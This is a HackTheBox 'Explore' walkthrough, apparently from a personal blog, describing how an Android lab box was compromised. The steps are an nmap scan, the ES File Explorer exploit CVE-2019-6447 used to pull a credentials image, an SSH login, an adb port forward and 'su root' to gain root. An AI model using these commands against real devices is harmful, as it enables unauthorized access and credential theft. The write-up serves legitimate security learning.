Explore Writeup - HackTheBox

Explore is a easy box from HackTheBox. This box is a mobile system, a phone and it was my first mobile box on HTB.

Pedro Mariano

2 min

Welcome to the writeup of Explore box from HackTheBox. This box is a mobile system, a phone and it was my first mobile box on HTB. It's not a complex box, but it's interesting.

Let's go!

NMAP


          
            nmap -v -sSV -p 2222,5555,40947,42135,59777 -Pn 10.10.10.247 -T4 -oN nmap/sSV.txt
          
          
            
          
          
            PORT      STATE    SERVICE VERSION
          
          
            2222/tcp  open     ssh     (protocol 2.0)
          
          
            5555/tcp  filtered freeciv
          
          
            40947/tcp open     unknown
          
          
            42135/tcp open     http    ES File Explorer Name Response httpd
          
          
            59777/tcp open     http    Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
          
          
            2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
          
          
            ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
          
          
            SF-Port2222-TCP:V=7.91%I=7%D=7/14%Time=60EEEAD6%P=x86_64-pc-linux-gnu%r(NU
          
          
            SF:LL,24,"SSH-2\.0-SSH\x20Server\x20-\x20Banana\x20Studio\r\n");
          
          
            ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
          
          
            SF-Port40947-TCP:V=7.91%I=7%D=7/14%Time=60EEEAD5%P=x86_64-pc-linux-gnu%r(G
          
          
            SF:enericLines,AA,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nDate:\x20Wed,\x20
          
          
            SF:14\x20Jul\x202021\x2013:50:57\x20GMT\r\nContent-Length:\x2022\r\nConten
          
          
            SF:t-Type:\x20text/plain;\x20charset=US-ASCII\r\nConnection:\x20Close\r\n\
          
          
            SF:r\nInvalid\x20request\x20line:\x20")%r(GetRequest,5C,"HTTP/1\.1\x20412\
          
          
            SF:x20Precondition\x20Failed\r\nDate:\x20Wed,\x2014\x20Jul\x202021\x2013:5
          
          
            SF:0:57\x20GMT\r\nContent-Length:\x200\r\n\r\n")%r(HTTPOptions,B5,"HTTP/1\
          
          
            SF:.0\x20501\x20Not\x20Implemented\r\nDate:\x20Wed,\x2014\x20Jul\x202021\x
          
          
            SF:2013:51:02\x20GMT\r\nContent-Length:\x2029\r\nContent-Type:\x20text/pla
          
          
            SF:in;\x20charset=US-ASCII\r\nConnection:\x20Close\r\n\r\nMethod\x20not\x2
          
          
            SF:0supported:\x20OPTIONS")%r(RTSPRequest,BB,"HTTP/1\.0\x20400\x20Bad\x20R
          
          
            SF:equest\r\nDate:\x20Wed,\x2014\x20Jul\x202021\x2013:51:02\x20GMT\r\nCont
          
          
            SF:ent-Length:\x2039\r\nContent-Type:\x20text/plain;\x20charset=US-ASCII\r
          
          
            SF:\nConnection:\x20Close\r\n\r\nNot\x20a\x20valid\x20protocol\x20version:
          
          
            SF:\x20\x20RTSP/1\.0")%r(Help,AE,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nDa
          
          
            SF:te:\x20Wed,\x2014\x20Jul\x202021\x2013:51:18\x20GMT\r\nContent-Length:\
          
          
            SF:x2026\r\nContent-Type:\x20text/plain;\x20charset=US-ASCII\r\nConnection
          
          
            SF::\x20Close\r\n\r\nInvalid\x20request\x20line:\x20HELP")%r(SSLSessionReq
          
          
            SF:,DD,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nDate:\x20Wed,\x2014\x20Jul\x
          
          
            SF:202021\x2013:51:18\x20GMT\r\nContent-Length:\x2073\r\nContent-Type:\x20
          
          
            SF:text/plain;\x20charset=US-ASCII\r\nConnection:\x20Close\r\n\r\nInvalid\
          
          
            SF:x20request\x20line:\x20\x16\x03\0\0S\x01\0\0O\x03\0\?G\?\?\?,\?\?\?`~\?
          
          
            SF:\0\?\?{\?\?\?\?w\?\?\?\?<=\?o\?\x10n\0\0\(\0\x16\0\x13\0")%r(TerminalSe
          
          
            SF:rverCookie,CA,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nDate:\x20Wed,\x201
          
          
            SF:4\x20Jul\x202021\x2013:51:18\x20GMT\r\nContent-Length:\x2054\r\nContent
          
          
            SF:-Type:\x20text/plain;\x20charset=US-ASCII\r\nConnection:\x20Close\r\n\r
          
          
            SF:\nInvalid\x20request\x20line:\x20\x03\0\0\*%\?\0\0\0\0\0Cookie:\x20msts
          
          
            SF:hash=nmap")%r(TLSSessionReq,DB,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nD
          
          
            SF:ate:\x20Wed,\x2014\x20Jul\x202021\x2013:51:18\x20GMT\r\nContent-Length:
          
          
            SF:\x2071\r\nContent-Type:\x20text/plain;\x20charset=US-ASCII\r\nConnectio
          
          
            SF:n:\x20Close\r\n\r\nInvalid\x20request\x20line:\x20\x16\x03\0\0i\x01\0\0
          
          
            SF:e\x03\x03U\x1c\?\?random1random2random3random4\0\0\x0c\0/\0");
          
          
            Service Info: Device: phone

According to the information presented by the scan, this is a phone...

Researching about the identified services I found some interesting infos.

JSONAPI is a plugin for Bukkit that allows you to access data and other information about your server and your players through a simple, yet secure, HTTP API. This allows you to make awesome websites, iPhone apps, and a way for your players to purchase goods online and automatically receive them in game. - https://github.com/alecgorge/jsonapi

Port 42135 is running a ES File Explorer this creates an HTTP service bound to port 59777 and doing a search you can find a public exploit (CVE-2019-6447).


          
            searchsploit ES File Explorer

Through this exploit I could read some files and with attention I could find an interesting .jpg.


          
            python3 ESFileExploIt.py listPics 10.10.10.247
          
          
            
          
          
            python3 ESFileExploIt.py getFile 10.10.10.247 /storage/emulated/0/DCIM/creds.jpg

PS: This image is cropped!

This .jpg has notes looking like credentials... As enumerated before, the SSH service is running on port 2222 and using this credentials we were able to login successfully.


          
            ssh kristi@10.10.10.247 -p 2222

Now we are inside and are able to find the user flag at /sdcard.

Privilege Escalation

Looking for a way to own the Android system I found some things about Android Debug Bridge (adb) - a development tool that allows communication between an Android device and a computer as a shell.

As some documentations the adb opens a localport (as "system") 5555 and its possible to connect on it through USB setting the configured port, but is possible to bypass this "restriction" doing a portfoward to our machine, in this case, using SSH to do that.


          
            ssh kristi@10.10.10.247 -L 5555:localhost:5555 -p 2222

After insert password to stabilish connection the SSH shell starts, but in another terminal its possible to see the localhost port 5555 fowarded to our machine. With that, its possible to interage on this port and we will use adb to do that.


          
            adb connect localhost:5555
          
          
            
          
          
            adb shell

After connect and get a shell with adb we are inside again but through adb.

Adb is running with privileges so we can elevate our privilege to root with a simple command su root.

And now as root I could found the root flag using find command to search it.

Thanks for reading and feel free to pingback a coffee ;D

naP0

Give a Pingback

References:

https://github.com/alecgorge/jsonapi

https://www.exploit-db.com/exploits/50070

https://nvd.nist.gov/vuln/detail/CVE-2019-6447

https://labs.f-secure.com/assets/BlogFiles/mwri-android-adbd-privilege-escalation-advisory-2018-01-17.pdf

Learn

Support

More Options